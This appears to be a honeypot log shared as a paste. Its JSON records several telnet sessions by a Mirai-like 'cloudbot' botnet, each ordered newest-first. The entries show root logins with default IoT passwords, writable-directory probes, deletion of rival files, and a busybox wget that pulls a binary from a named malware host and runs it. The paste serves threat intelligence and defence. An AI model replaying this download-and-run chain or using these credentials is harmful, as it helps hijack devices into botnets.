
cloudbot/AirDropBot @0xrb

a guest
Sep 30th, 2019
  1. {
  2. "datas": [],
  3. "inputs": {
  4. "2c08de6f5477": [
  5. {
  6. "eventid": "command.input",
  7. "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  8. "timestamp": "2019-08-06T17:32:46.672Z"
  9. },
  10. {
  11. "eventid": "command.input",
  12. "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  13. "timestamp": "2019-08-06T17:32:46.399Z"
  14. },
  15. {
  16. "eventid": "command.input",
  17. "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  18. "timestamp": "2019-08-06T17:32:41.469Z"
  19. },
  20. {
  21. "eventid": "command.input",
  22. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  23. "timestamp": "2019-08-06T17:32:41.199Z"
  24. },
  25. {
  26. "eventid": "command.input",
  27. "input": "/bin/busybox ECCHI",
  28. "timestamp": "2019-08-06T17:32:40.927Z"
  29. },
  30. {
  31. "eventid": "command.input",
  32. "input": "/bin/busybox cat /bin/echo",
  33. "timestamp": "2019-08-06T17:32:40.642Z"
  34. },
  35. {
  36. "eventid": "command.input",
  37. "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  38. "timestamp": "2019-08-06T17:32:40.364Z"
  39. },
  40. {
  41. "eventid": "command.input",
  42. "input": "cd /",
  43. "timestamp": "2019-08-06T17:32:40.363Z"
  44. },
  45. {
  46. "eventid": "command.input",
  47. "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  48. "timestamp": "2019-08-06T17:32:40.361Z"
  49. },
  50. {
  51. "eventid": "command.input",
  52. "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  53. "timestamp": "2019-08-06T17:32:40.356Z"
  54. },
  55. {
  56. "eventid": "command.input",
  57. "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  58. "timestamp": "2019-08-06T17:32:40.353Z"
  59. },
  60. {
  61. "eventid": "command.input",
  62. "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  63. "timestamp": "2019-08-06T17:32:40.35Z"
  64. },
  65. {
  66. "eventid": "command.input",
  67. "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  68. "timestamp": "2019-08-06T17:32:40.347Z"
  69. },
  70. {
  71. "eventid": "command.input",
  72. "input": "rm /.t; rm /.sh; rm /.human",
  73. "timestamp": "2019-08-06T17:32:40.345Z"
  74. },
  75. {
  76. "eventid": "command.input",
  77. "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  78. "timestamp": "2019-08-06T17:32:40.34Z"
  79. },
  80. {
  81. "eventid": "command.input",
  82. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  83. "timestamp": "2019-08-06T17:32:39.689Z"
  84. },
  85. {
  86. "eventid": "command.input",
  87. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  88. "timestamp": "2019-08-06T17:32:39.684Z"
  89. },
  90. {
  91. "eventid": "command.input",
  92. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  93. "timestamp": "2019-08-06T17:32:39.677Z"
  94. },
  95. {
  96. "eventid": "command.input",
  97. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  98. "timestamp": "2019-08-06T17:32:39.671Z"
  99. },
  100. {
  101. "eventid": "command.input",
  102. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  103. "timestamp": "2019-08-06T17:32:39.461Z"
  104. }
  105. ],
  106. "33837076c101": [
  107. {
  108. "eventid": "command.input",
  109. "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  110. "timestamp": "2019-08-06T17:34:02.945Z"
  111. },
  112. {
  113. "eventid": "command.input",
  114. "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  115. "timestamp": "2019-08-06T17:34:02.742Z"
  116. },
  117. {
  118. "eventid": "command.input",
  119. "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  120. "timestamp": "2019-08-06T17:34:00.825Z"
  121. },
  122. {
  123. "eventid": "command.input",
  124. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  125. "timestamp": "2019-08-06T17:34:00.622Z"
  126. },
  127. {
  128. "eventid": "command.input",
  129. "input": "/bin/busybox ECCHI",
  130. "timestamp": "2019-08-06T17:34:00.386Z"
  131. },
  132. {
  133. "eventid": "command.input",
  134. "input": "/bin/busybox cat /bin/echo",
  135. "timestamp": "2019-08-06T17:34:00.161Z"
  136. },
  137. {
  138. "eventid": "command.input",
  139. "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  140. "timestamp": "2019-08-06T17:33:59.737Z"
  141. },
  142. {
  143. "eventid": "command.input",
  144. "input": "cd /",
  145. "timestamp": "2019-08-06T17:33:59.735Z"
  146. },
  147. {
  148. "eventid": "command.input",
  149. "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  150. "timestamp": "2019-08-06T17:33:59.732Z"
  151. },
  152. {
  153. "eventid": "command.input",
  154. "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  155. "timestamp": "2019-08-06T17:33:59.725Z"
  156. },
  157. {
  158. "eventid": "command.input",
  159. "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  160. "timestamp": "2019-08-06T17:33:59.722Z"
  161. },
  162. {
  163. "eventid": "command.input",
  164. "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  165. "timestamp": "2019-08-06T17:33:59.719Z"
  166. },
  167. {
  168. "eventid": "command.input",
  169. "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  170. "timestamp": "2019-08-06T17:33:59.716Z"
  171. },
  172. {
  173. "eventid": "command.input",
  174. "input": "rm /.t; rm /.sh; rm /.human",
  175. "timestamp": "2019-08-06T17:33:59.712Z"
  176. },
  177. {
  178. "eventid": "command.input",
  179. "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  180. "timestamp": "2019-08-06T17:33:59.706Z"
  181. },
  182. {
  183. "eventid": "command.input",
  184. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  185. "timestamp": "2019-08-06T17:33:58.538Z"
  186. },
  187. {
  188. "eventid": "command.input",
  189. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  190. "timestamp": "2019-08-06T17:33:58.531Z"
  191. },
  192. {
  193. "eventid": "command.input",
  194. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  195. "timestamp": "2019-08-06T17:33:58.523Z"
  196. },
  197. {
  198. "eventid": "command.input",
  199. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  200. "timestamp": "2019-08-06T17:33:58.515Z"
  201. },
  202. {
  203. "eventid": "command.input",
  204. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  205. "timestamp": "2019-08-06T17:33:58.38Z"
  206. },
  207. {
  208. "eventid": "command.input",
  209. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  210. "timestamp": "2019-08-06T17:33:58.365Z"
  211. },
  212. {
  213. "eventid": "command.input",
  214. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  215. "timestamp": "2019-08-06T17:33:58.357Z"
  216. },
  217. {
  218. "eventid": "command.input",
  219. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  220. "timestamp": "2019-08-06T17:33:58.351Z"
  221. },
  222. {
  223. "eventid": "command.input",
  224. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  225. "timestamp": "2019-08-06T17:33:58.344Z"
  226. },
  227. {
  228. "eventid": "command.input",
  229. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  230. "timestamp": "2019-08-06T17:33:58.337Z"
  231. },
  232. {
  233. "eventid": "command.input",
  234. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  235. "timestamp": "2019-08-06T17:33:58.322Z"
  236. },
  237. {
  238. "eventid": "command.input",
  239. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  240. "timestamp": "2019-08-06T17:33:58.315Z"
  241. },
  242. {
  243. "eventid": "command.input",
  244. "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  245. "timestamp": "2019-08-06T17:33:57.634Z"
  246. },
  247. {
  248. "eventid": "command.input",
  249. "input": "/bin/busybox ps; /bin/busybox ECCHI",
  250. "timestamp": "2019-08-06T17:33:57.425Z"
  251. },
  252. {
  253. "eventid": "command.input",
  254. "input": "bash",
  255. "timestamp": "2019-08-06T17:33:56.465Z"
  256. },
  257. {
  258. "eventid": "command.input",
  259. "input": "terminal",
  260. "timestamp": "2019-08-06T17:33:56.463Z"
  261. },
  262. {
  263. "eventid": "command.input",
  264. "input": "linuxshell",
  265. "timestamp": "2019-08-06T17:33:56.461Z"
  266. },
  267. {
  268. "eventid": "command.input",
  269. "input": "sh",
  270. "timestamp": "2019-08-06T17:33:56.459Z"
  271. },
  272. {
  273. "eventid": "command.input",
  274. "input": "shell",
  275. "timestamp": "2019-08-06T17:33:56.455Z"
  276. },
  277. {
  278. "eventid": "command.input",
  279. "input": "enable",
  280. "timestamp": "2019-08-06T17:33:56.244Z"
  281. },
  282. {
  283. "eventid": "login.success",
  284. "geoip": {
  285. "city_name": "",
  286. "country_name": "Netherlands"
  287. },
  288. "password": "t0talc0ntr0l4!",
  289. "timestamp": "2019-08-06T17:33:55.628Z",
  290. "username": "root"
  291. }
  292. ],
  293. "8f610699f8d2": [
  294. {
  295. "eventid": "command.input",
  296. "input": "/bin/busybox ECCHI",
  297. "timestamp": "2019-08-06T17:33:26.74Z"
  298. },
  299. {
  300. "eventid": "command.input",
  301. "input": "/bin/busybox cat /bin/echo",
  302. "timestamp": "2019-08-06T17:33:26.437Z"
  303. },
  304. {
  305. "eventid": "command.input",
  306. "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  307. "timestamp": "2019-08-06T17:33:26.288Z"
  308. },
  309. {
  310. "eventid": "command.input",
  311. "input": "cd /",
  312. "timestamp": "2019-08-06T17:33:26.286Z"
  313. },
  314. {
  315. "eventid": "command.input",
  316. "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  317. "timestamp": "2019-08-06T17:33:26.28Z"
  318. },
  319. {
  320. "eventid": "command.input",
  321. "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  322. "timestamp": "2019-08-06T17:33:26.271Z"
  323. },
  324. {
  325. "eventid": "command.input",
  326. "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  327. "timestamp": "2019-08-06T17:33:26.266Z"
  328. },
  329. {
  330. "eventid": "command.input",
  331. "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  332. "timestamp": "2019-08-06T17:33:26.26Z"
  333. },
  334. {
  335. "eventid": "command.input",
  336. "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  337. "timestamp": "2019-08-06T17:33:26.257Z"
  338. },
  339. {
  340. "eventid": "command.input",
  341. "input": "rm /.t; rm /.sh; rm /.human",
  342. "timestamp": "2019-08-06T17:33:26.249Z"
  343. },
  344. {
  345. "eventid": "command.input",
  346. "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  347. "timestamp": "2019-08-06T17:33:26.241Z"
  348. },
  349. {
  350. "eventid": "command.input",
  351. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  352. "timestamp": "2019-08-06T17:33:25.931Z"
  353. },
  354. {
  355. "eventid": "command.input",
  356. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  357. "timestamp": "2019-08-06T17:33:25.922Z"
  358. },
  359. {
  360. "eventid": "command.input",
  361. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  362. "timestamp": "2019-08-06T17:33:25.908Z"
  363. },
  364. {
  365. "eventid": "command.input",
  366. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  367. "timestamp": "2019-08-06T17:33:25.897Z"
  368. },
  369. {
  370. "eventid": "command.input",
  371. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  372. "timestamp": "2019-08-06T17:33:25.725Z"
  373. },
  374. {
  375. "eventid": "command.input",
  376. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  377. "timestamp": "2019-08-06T17:33:25.697Z"
  378. },
  379. {
  380. "eventid": "command.input",
  381. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  382. "timestamp": "2019-08-06T17:33:25.686Z"
  383. },
  384. {
  385. "eventid": "command.input",
  386. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  387. "timestamp": "2019-08-06T17:33:25.675Z"
  388. },
  389. {
  390. "eventid": "command.input",
  391. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  392. "timestamp": "2019-08-06T17:33:25.665Z"
  393. },
  394. {
  395. "eventid": "command.input",
  396. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  397. "timestamp": "2019-08-06T17:33:25.65Z"
  398. },
  399. {
  400. "eventid": "command.input",
  401. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  402. "timestamp": "2019-08-06T17:33:25.629Z"
  403. },
  404. {
  405. "eventid": "command.input",
  406. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  407. "timestamp": "2019-08-06T17:33:25.616Z"
  408. },
  409. {
  410. "eventid": "command.input",
  411. "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  412. "timestamp": "2019-08-06T17:33:25.456Z"
  413. },
  414. {
  415. "eventid": "command.input",
  416. "input": "/bin/busybox ps; /bin/busybox ECCHI",
  417. "timestamp": "2019-08-06T17:33:25.301Z"
  418. },
  419. {
  420. "eventid": "command.input",
  421. "input": "bash",
  422. "timestamp": "2019-08-06T17:33:24.959Z"
  423. },
  424. {
  425. "eventid": "command.input",
  426. "input": "terminal",
  427. "timestamp": "2019-08-06T17:33:24.958Z"
  428. },
  429. {
  430. "eventid": "command.input",
  431. "input": "linuxshell",
  432. "timestamp": "2019-08-06T17:33:24.951Z"
  433. },
  434. {
  435. "eventid": "command.input",
  436. "input": "sh",
  437. "timestamp": "2019-08-06T17:33:24.95Z"
  438. },
  439. {
  440. "eventid": "command.input",
  441. "input": "shell",
  442. "timestamp": "2019-08-06T17:33:24.948Z"
  443. },
  444. {
  445. "eventid": "command.input",
  446. "input": "enable",
  447. "timestamp": "2019-08-06T17:33:24.779Z"
  448. },
  449. {
  450. "eventid": "login.success",
  451. "geoip": {
  452. "city_name": "",
  453. "country_name": "Netherlands"
  454. },
  455. "password": "t0talc0ntr0l4!",
  456. "timestamp": "2019-08-06T17:33:23.629Z",
  457. "username": "root"
  458. }
  459. ],
  460. "c3aee80c84a8": [
  461. {
  462. "eventid": "command.input",
  463. "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  464. "timestamp": "2019-08-06T17:34:43.292Z"
  465. },
  466. {
  467. "eventid": "command.input",
  468. "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  469. "timestamp": "2019-08-06T17:34:43.014Z"
  470. },
  471. {
  472. "eventid": "command.input",
  473. "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  474. "timestamp": "2019-08-06T17:33:54.963Z"
  475. },
  476. {
  477. "eventid": "command.input",
  478. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  479. "timestamp": "2019-08-06T17:33:54.681Z"
  480. },
  481. {
  482. "eventid": "command.input",
  483. "input": "/bin/busybox ECCHI",
  484. "timestamp": "2019-08-06T17:33:53.801Z"
  485. },
  486. {
  487. "eventid": "command.input",
  488. "input": "/bin/busybox cat /bin/echo",
  489. "timestamp": "2019-08-06T17:33:52.543Z"
  490. },
  491. {
  492. "eventid": "command.input",
  493. "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  494. "timestamp": "2019-08-06T17:33:52.254Z"
  495. },
  496. {
  497. "eventid": "command.input",
  498. "input": "cd /",
  499. "timestamp": "2019-08-06T17:33:52.252Z"
  500. },
  501. {
  502. "eventid": "command.input",
  503. "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  504. "timestamp": "2019-08-06T17:33:52.25Z"
  505. },
  506. {
  507. "eventid": "command.input",
  508. "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  509. "timestamp": "2019-08-06T17:33:52.245Z"
  510. },
  511. {
  512. "eventid": "command.input",
  513. "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  514. "timestamp": "2019-08-06T17:33:52.242Z"
  515. },
  516. {
  517. "eventid": "command.input",
  518. "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  519. "timestamp": "2019-08-06T17:33:52.24Z"
  520. },
  521. {
  522. "eventid": "command.input",
  523. "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  524. "timestamp": "2019-08-06T17:33:52.237Z"
  525. },
  526. {
  527. "eventid": "command.input",
  528. "input": "rm /.t; rm /.sh; rm /.human",
  529. "timestamp": "2019-08-06T17:33:52.235Z"
  530. },
  531. {
  532. "eventid": "command.input",
  533. "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  534. "timestamp": "2019-08-06T17:33:52.23Z"
  535. },
  536. {
  537. "eventid": "command.input",
  538. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
  539. "timestamp": "2019-08-06T17:33:51.627Z"
  540. },
  541. {
  542. "eventid": "command.input",
  543. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc/sys/fs/binfmt_misc' \u003e /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox cat /proc/sys/fs/binfmt_misc/.nippon; /bin/busybox rm /proc/sys/fs/binfmt_misc/.nippon",
  544. "timestamp": "2019-08-06T17:33:51.622Z"
  545. },
  546. {
  547. "eventid": "command.input",
  548. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/home' \u003e /home/.nippon; /bin/busybox cat /home/.nippon; /bin/busybox rm /home/.nippon",
  549. "timestamp": "2019-08-06T17:33:51.615Z"
  550. },
  551. {
  552. "eventid": "command.input",
  553. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/boot' \u003e /boot/.nippon; /bin/busybox cat /boot/.nippon; /bin/busybox rm /boot/.nippon",
  554. "timestamp": "2019-08-06T17:33:51.609Z"
  555. },
  556. {
  557. "eventid": "command.input",
  558. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys/fs/fuse/connections' \u003e /sys/fs/fuse/connections/.nippon; /bin/busybox cat /sys/fs/fuse/connections/.nippon; /bin/busybox rm /sys/fs/fuse/connections/.nippon",
  559. "timestamp": "2019-08-06T17:33:51.367Z"
  560. },
  561. {
  562. "eventid": "command.input",
  563. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run/lock' \u003e /run/lock/.nippon; /bin/busybox cat /run/lock/.nippon; /bin/busybox rm /run/lock/.nippon",
  564. "timestamp": "2019-08-06T17:33:51.355Z"
  565. },
  566. {
  567. "eventid": "command.input",
  568. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/shm' \u003e /dev/shm/.nippon; /bin/busybox cat /dev/shm/.nippon; /bin/busybox rm /dev/shm/.nippon",
  569. "timestamp": "2019-08-06T17:33:51.35Z"
  570. },
  571. {
  572. "eventid": "command.input",
  573. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69' \u003e /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon",
  574. "timestamp": "2019-08-06T17:33:51.345Z"
  575. },
  576. {
  577. "eventid": "command.input",
  578. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/run' \u003e /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm /run/.nippon",
  579. "timestamp": "2019-08-06T17:33:51.34Z"
  580. },
  581. {
  582. "eventid": "command.input",
  583. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev/pts' \u003e /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon",
  584. "timestamp": "2019-08-06T17:33:51.335Z"
  585. },
  586. {
  587. "eventid": "command.input",
  588. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/proc' \u003e /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon",
  589. "timestamp": "2019-08-06T17:33:51.324Z"
  590. },
  591. {
  592. "eventid": "command.input",
  593. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/sys' \u003e /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon",
  594. "timestamp": "2019-08-06T17:33:51.319Z"
  595. },
  596. {
  597. "eventid": "command.input",
  598. "input": "/bin/busybox cat /proc/mounts; /bin/busybox ECCHI",
  599. "timestamp": "2019-08-06T17:33:46.938Z"
  600. },
  601. {
  602. "eventid": "command.input",
  603. "input": "/bin/busybox ps; /bin/busybox ECCHI",
  604. "timestamp": "2019-08-06T17:33:46.039Z"
  605. },
  606. {
  607. "eventid": "command.input",
  608. "input": "bash",
  609. "timestamp": "2019-08-06T17:33:44.818Z"
  610. },
  611. {
  612. "eventid": "command.input",
  613. "input": "terminal",
  614. "timestamp": "2019-08-06T17:33:44.816Z"
  615. },
  616. {
  617. "eventid": "command.input",
  618. "input": "linuxshell",
  619. "timestamp": "2019-08-06T17:33:44.814Z"
  620. },
  621. {
  622. "eventid": "command.input",
  623. "input": "sh",
  624. "timestamp": "2019-08-06T17:33:44.813Z"
  625. },
  626. {
  627. "eventid": "command.input",
  628. "input": "shell",
  629. "timestamp": "2019-08-06T17:33:44.811Z"
  630. },
  631. {
  632. "eventid": "command.input",
  633. "input": "enable",
  634. "timestamp": "2019-08-06T17:33:44.526Z"
  635. },
  636. {
  637. "eventid": "login.success",
  638. "geoip": {
  639. "city_name": "",
  640. "country_name": "Netherlands"
  641. },
  642. "password": "vizxv",
  643. "timestamp": "2019-08-06T17:33:43.696Z",
  644. "username": "root"
  645. }
  646. ],
  647. "e551f86e07d6": [
  648. {
  649. "eventid": "command.input",
  650. "input": "rm -rf upnp; \u003e dvrHelper; /bin/busybox ECCHI",
  651. "timestamp": "2019-08-06T17:34:33.79Z"
  652. },
  653. {
  654. "eventid": "command.input",
  655. "input": "./dvrHelper telnet.x86; /bin/busybox IHCCE",
  656. "timestamp": "2019-08-06T17:34:33.55Z"
  657. },
  658. {
  659. "eventid": "command.input",
  660. "input": "/bin/busybox wget http://91.234.99.177:80/bins/x86.cloudbot -O - \u003e dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  661. "timestamp": "2019-08-06T17:34:27.41Z"
  662. },
  663. {
  664. "eventid": "command.input",
  665. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI",
  666. "timestamp": "2019-08-06T17:34:26.038Z"
  667. },
  668. {
  669. "eventid": "command.input",
  670. "input": "/bin/busybox ECCHI",
  671. "timestamp": "2019-08-06T17:34:25.801Z"
  672. },
  673. {
  674. "eventid": "command.input",
  675. "input": "/bin/busybox cat /bin/echo",
  676. "timestamp": "2019-08-06T17:34:25.559Z"
  677. },
  678. {
  679. "eventid": "command.input",
  680. "input": "/bin/busybox cp /bin/echo dvrHelper; \u003edvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
  681. "timestamp": "2019-08-06T17:34:25.124Z"
  682. },
  683. {
  684. "eventid": "command.input",
  685. "input": "cd /",
  686. "timestamp": "2019-08-06T17:34:25.122Z"
  687. },
  688. {
  689. "eventid": "command.input",
  690. "input": "rm /dev/.t; rm /dev/.sh; rm /dev/.human",
  691. "timestamp": "2019-08-06T17:34:25.119Z"
  692. },
  693. {
  694. "eventid": "command.input",
  695. "input": "rm /home/.t; rm /home/.sh; rm /home/.human",
  696. "timestamp": "2019-08-06T17:34:25.116Z"
  697. },
  698. {
  699. "eventid": "command.input",
  700. "input": "rm /boot/.t; rm /boot/.sh; rm /boot/.human",
  701. "timestamp": "2019-08-06T17:34:25.113Z"
  702. },
  703. {
  704. "eventid": "command.input",
  705. "input": "rm /run/lock/.t; rm /run/lock/.sh; rm /run/lock/.human",
  706. "timestamp": "2019-08-06T17:34:25.111Z"
  707. },
  708. {
  709. "eventid": "command.input",
  710. "input": "rm /dev/shm/.t; rm /dev/shm/.sh; rm /dev/shm/.human",
  711. "timestamp": "2019-08-06T17:34:25.107Z"
  712. },
  713. {
  714. "eventid": "command.input",
  715. "input": "rm /.t; rm /.sh; rm /.human",
  716. "timestamp": "2019-08-06T17:34:25.104Z"
  717. },
  718. {
  719. "eventid": "command.input",
  720. "input": "rm /run/.t; rm /run/.sh; rm /run/.human",
  721. "timestamp": "2019-08-06T17:34:25.099Z"
  722. },
  723. {
  724. "eventid": "command.input",
  725. "input": "/bin/busybox echo -e '\\x6b\\x61\\x6d\\x69/dev' \u003e /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon",
